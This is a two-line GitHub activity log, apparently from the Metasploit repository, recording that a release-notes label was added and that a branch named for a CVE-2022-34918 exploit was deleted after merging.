@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 27, 2022
@red0xff red0xff deleted the add_exploit_cve-2022-34918 branch September 27, 2022 23:39